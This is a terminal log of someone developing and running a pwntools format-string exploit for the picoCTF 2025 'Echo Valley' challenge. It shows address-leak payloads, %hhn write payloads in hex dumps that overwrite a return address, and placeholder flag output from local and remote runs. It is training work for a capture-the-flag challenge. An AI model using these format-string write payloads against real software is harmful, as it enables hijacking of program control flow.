  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 26, in attack
    proc.sendlineafter( 'distance: ', b'%20$p %25$p'.ljust(16, b' ') )
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 841, in sendlineafter
    res = self.recvuntil(delim, timeout=timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 341, in recvuntil
    res = self.recv(timeout=self.timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 106, in recv
    return self._recv(numb, timeout) or b''
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 176, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
                               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 155, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/sock.py", line 39, in recv_raw
    data = self.sock.recv(numb, *a)
           ^^^^^^^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
[*] Closed connection to shape-facility.picoctf.net port 56668

(20240819)
user@parrot(2040) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:130]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 56668: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
^CTraceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 76, in <module>
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 72, in main
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 26, in attack
    proc.sendlineafter( 'distance: ', b'%20$p %25$p'.ljust(16, b' ') )
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 841, in sendlineafter
    res = self.recvuntil(delim, timeout=timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 341, in recvuntil
    res = self.recv(timeout=self.timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 106, in recv
    return self._recv(numb, timeout) or b''
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 176, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
                               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 155, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/sock.py", line 39, in recv_raw
    data = self.sock.recv(numb, *a)
           ^^^^^^^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
[*] Closed connection to shape-facility.picoctf.net port 56668

(20240819)
user@parrot(2040) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:130]$ ll
合計 32K
drwxr-xr-x 1 user user   78  5月 13 18:21 ./
drwxr-xr-x 1 user user  300  5月 13 18:21 ../
-rwxr--r-- 1 user user 2.4K  5月 13 18:28 exploit_valley.py*
-rwxr--r-- 1 user user   17  3月  9 20:37 flag.txt*
-rwxr--r-- 1 user user  20K  3月 16 18:50 valley*
-rwxr--r-- 1 user user  955  3月 16 18:50 valley.c*
(20240819)
user@parrot(2041) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Starting local process './valley' argv=[b'./valley'] : pid 413108
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
^CTraceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 76, in <module>
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 72, in main
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 26, in attack
    proc.sendlineafter( 'distance: ', b'%20$p %25$p'.ljust(16, b' ') )
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 841, in sendlineafter
    res = self.recvuntil(delim, timeout=timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 341, in recvuntil
    res = self.recv(timeout=self.timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 106, in recv
    return self._recv(numb, timeout) or b''
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 176, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
                               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 155, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 716, in recv_raw
    if not self.can_recv_raw(self.timeout):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 777, in can_recv_raw
    return select.select([self.proc.stdout], [], [], timeout) == ([self.proc.stdout], [], [])
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
[*] Stopped process './valley' (pid 413108)

(20240819)
user@parrot(2042) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:130]$ ./
exploit_valley.py  flag.txt           valley             valley.c
(20240819)
user@parrot(2042) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:130]$ ./va
valley    valley.c
(20240819)
user@parrot(2042) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:130]$ ./valley
Welcome to the Echo Valley, Try Shouting:
a
You heard in the distance: a
b
You heard in the distance: b
b
You heard in the distance: b
c
You heard in the distance: c

EOF detected. Exiting...
(20240819)
user@parrot(2043) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Starting local process './valley' argv=[b'./valley'] : pid 413836
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %25$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:28: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffce5685ba0 0x560c07087401     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffce5685ba0 0x560c07087401
    , lst_addr[0]=0x7ffce5685ba0, lst_addr[1]=0x560c07087401
[*] addr_main=0x560c07087401, addr_flag=0x560c07087269, addr_stack=0x7ffce5685b98
[*] first < second: ss=%105x%9$hhn%9x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 30 35  78 25 39 24  68 68 6e 25  39 78 25 31  x%105xx%9$xhhn%x9x%1x
    00000010  30 24 68 68  6e 20 20 20  98 5b 68 e5  fc 7f 00 00  x0$hhxn   x?[h?x????x
    00000020  99 5b 68 e5  fc 7f 00 00  0a                        x?[h?x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[*] Process './valley' stopped with exit code 0 (pid 413836)
[DEBUG] Received 0xda bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000070  20 20 20 20  20 20 20 20  20 20 20 20  20 37 30 38  x    x    x    x 708x
    00000080  38 30 63 31  20 20 20 20  20 20 20 20  30 20 20 20  x80c1x    x    x0   x
    00000090  98 5b 68 e5  fc 7f 54 68  65 20 56 61  6c 6c 65 79  x?[h?x??Thxe Vaxlleyx
    000000a0  20 44 69 73  61 70 70 65  61 72 73 0a  43 6f 6e 67  x Disxappexars?xCongx
    000000b0  72 61 74 73  21 20 48 65  72 65 20 69  73 20 79 6f  xratsx! Hexre ixs yox
    000000c0  75 72 20 66  6c 61 67 3a  20 70 69 63  6f 43 54 46  xur fxlag:x picxoCTFx
    000000d0  7b 64 65 61  64 62 65 65  66 7d                     x{deaxdbeexf}x
    000000da
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:                                                                                                   70880c1        0   [h??\x7fThe Valley Disappears
    Congrats! Here is your flag: picoCTF{deadbeef}
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 56668: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %25$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:28: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffcde591640 0x7ffcde591768     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffcde591640 0x7ffcde591768
    , lst_addr[0]=0x7ffcde591640, lst_addr[1]=0x7ffcde591768
[*] addr_main=0x7ffcde591768, addr_flag=0x7ffcde5915d0, addr_stack=0x7ffcde591638
[*] first > second: ss=%21x%9$hhn%187x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 32 31 78  25 39 24 68  68 6e 25 31  38 37 78 25  x%21xx%9$hxhn%1x87x%x
    00000010  31 30 24 68  68 6e 20 20  39 16 59 de  fc 7f 00 00  x10$hxhn  x9?Y?x????x
    00000020  38 16 59 de  fc 7f 00 00  0a                        x8?Y?x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0xf3 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  62 62 62 30  39 35 63 30  x    x    xbbb0x95c0x
    00000030  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    000000e0  20 20 20 20  20 20 20 20  20 20 30 20  20 39 16 59  x    x    x  0 x 9?Yx
    000000f0  de fc 7f                                            x???x
    000000f3
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:              bbb095c0                                                                                                                                                                                          0  9\x16Y??\x7f
[*] Closed connection to shape-facility.picoctf.net port 56668
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 56668: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:29: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffd447f6300 0x5f66c840e413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffd447f6300 0x5f66c840e413
    , lst_addr[0]=0x7ffd447f6300, lst_addr[1]=0x5f66c840e413
[*] addr_main=0x5f66c840e401, addr_flag=0x5f66c840e269, addr_stack=0x7ffd447f62f8
[*] first < second: ss=%105x%9$hhn%121x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 30 35  78 25 39 24  68 68 6e 25  31 32 31 78  x%105xx%9$xhhn%x121xx
    00000010  25 31 30 24  68 68 6e 20  f8 62 7f 44  fd 7f 00 00  x%10$xhhn x?b?Dx????x
    00000020  f9 62 7f 44  fd 7f 00 00  0a                        x?b?Dx????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0x104 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000070  20 20 20 20  20 20 20 20  20 20 20 20  20 34 36 35  x    x    x    x 465x
    00000080  38 35 63 30  20 20 20 20  20 20 20 20  20 20 20 20  x85c0x    x    x    x
    00000090  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    000000f0  20 20 20 20  20 20 20 20  20 20 20 20  30 20 f8 62  x    x    x    x0 ?bx
    00000100  7f 44 fd 7f                                         x?D??x
    00000104
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:                                                                                                   46585c0                                                                                                                        0 ?b\x7fD?\x7f
[*] Closed connection to shape-facility.picoctf.net port 56668
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 55019: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:29: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffd9ce2a690 0x62ecbb9de413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffd9ce2a690 0x62ecbb9de413
    , lst_addr[0]=0x7ffd9ce2a690, lst_addr[1]=0x62ecbb9de413
[*] addr_main=0x62ecbb9de401, addr_flag=0x62ecbb9de269, addr_stack=0x7ffd9ce2a688
[*] first < second: ss=%105x%9$hhn%121x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 30 35  78 25 39 24  68 68 6e 25  31 32 31 78  x%105xx%9$xhhn%x121xx
    00000010  25 31 30 24  68 68 6e 20  88 a6 e2 9c  fd 7f 00 00  x%10$xhhn x????x????x
    00000020  89 a6 e2 9c  fd 7f 00 00  0a                        x????x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0x104 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000070  20 20 20 20  20 20 20 20  20 20 20 20  66 36 39 39  x    x    x    xf699x
    00000080  37 35 63 30  20 20 20 20  20 20 20 20  20 20 20 20  x75c0x    x    x    x
    00000090  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    000000f0  20 20 20 20  20 20 20 20  20 20 20 20  30 20 88 a6  x    x    x    x0 ??x
    00000100  e2 9c fd 7f                                         x????x
    00000104
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:                                                                                                  f69975c0                                                                                                                        0???\x7f
[*] Closed connection to shape-facility.picoctf.net port 55019
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Starting local process './valley' argv=[b'./valley'] : pid 418280
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:29: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7fff80b2c8d0 0x55741f62a413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7fff80b2c8d0 0x55741f62a413
    , lst_addr[0]=0x7fff80b2c8d0, lst_addr[1]=0x55741f62a413
[*] addr_main=0x55741f62a401, addr_flag=0x55741f62a269, addr_stack=0x7fff80b2c8c8
[*] first < second: ss=%105x%9$hhn%57x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 30 35  78 25 39 24  68 68 6e 25  35 37 78 25  x%105xx%9$xhhn%x57x%x
    00000010  31 30 24 68  68 6e 20 20  c8 c8 b2 80  ff 7f 00 00  x10$hxhn  x????x????x
    00000020  c9 c8 b2 80  ff 7f 00 00  0a                        x????x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[*] Process './valley' stopped with exit code 0 (pid 418280)
[DEBUG] Received 0x109 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000070  20 20 20 20  20 20 20 20  20 20 20 20  31 66 36 32  x    x    x    x1f62x
    00000080  62 30 63 31  20 20 20 20  20 20 20 20  20 20 20 20  xb0c1x    x    x    x
    00000090  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    000000b0  20 20 20 20  20 20 20 20  20 20 20 20  30 20 20 c8  x    x    x    x0  ?x
    000000c0  c8 b2 80 ff  7f 54 68 65  20 56 61 6c  6c 65 79 20  x????x?Thex Valxley x
    000000d0  44 69 73 61  70 70 65 61  72 73 0a 43  6f 6e 67 72  xDisaxppeaxrs?Cxongrx
    000000e0  61 74 73 21  20 48 65 72  65 20 69 73  20 79 6f 75  xats!x Herxe isx youx
    000000f0  72 20 66 6c  61 67 3a 20  70 69 63 6f  43 54 46 7b  xr flxag: xpicoxCTF{x
    00000100  64 65 61 64  62 65 65 66  7d                        xdeadxbeefx}x
    00000109
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You heard in the distance:                                                                                                  1f62b0c1                                                        0  ????\x7fThe Valley Disappears
    Congrats! Here is your flag: picoCTF{deadbeef}
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$
(20240819)
user@parrot(2044) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 56971: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'
[DEBUG] Sent 0x11 bytes:
    b'%20$p %21$p     \n'
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py:29: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  info( proc.recvuntil('distance: ') ) # You heard in the distance:
[DEBUG] Received 0x3e bytes:
    b'You heard in the distance: 0x7ffdd7d7b5e0 0x5cd0777f8413     \n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*]
    You heard in the distance:
[*] addr=0x7ffdd7d7b5e0 0x5cd0777f8413
    , lst_addr[0]=0x7ffdd7d7b5e0, lst_addr[1]=0x5cd0777f8413
[*] addr_main=0x5cd0777f8401, addr_flag=0x5cd0777f8269, addr_stack=0x7ffdd7d7b5d8
[*] first < second: ss=%105x%9$hhn%25x%10$hhn
[DEBUG] Sent 0x29 bytes:
    00000000  25 31 30 35  78 25 39 24  68 68 6e 25  32 35 78 25  x%105xx%9$xhhn%x25x%x
    00000010  31 30 24 68  68 6e 20 20  d8 b5 d7 d7  fd 7f 00 00  x10$hxhn  x????x????x
    00000020  d9 b5 d7 d7  fd 7f 00 00  0a                        x????x????x?x
    00000029
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[DEBUG] Received 0xa5 bytes:
    00000000  59 6f 75 20  68 65 61 72  64 20 69 6e  20 74 68 65  xYou xhearxd inx thex
    00000010  20 64 69 73  74 61 6e 63  65 3a 20 20  20 20 20 20  x disxtancxe:  x    x
    00000020  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  x    x    x    x    x
    *
    00000070  20 20 20 20  20 20 20 20  20 20 20 20  39 62 62 33  x    x    x    x9bb3x
    00000080  31 35 63 30  20 20 20 20  20 20 20 20  20 20 20 20  x15c0x    x    x    x
    00000090  20 20 20 20  20 20 20 20  20 20 20 20  30 20 20 d8  x    x    x    x0  ?x
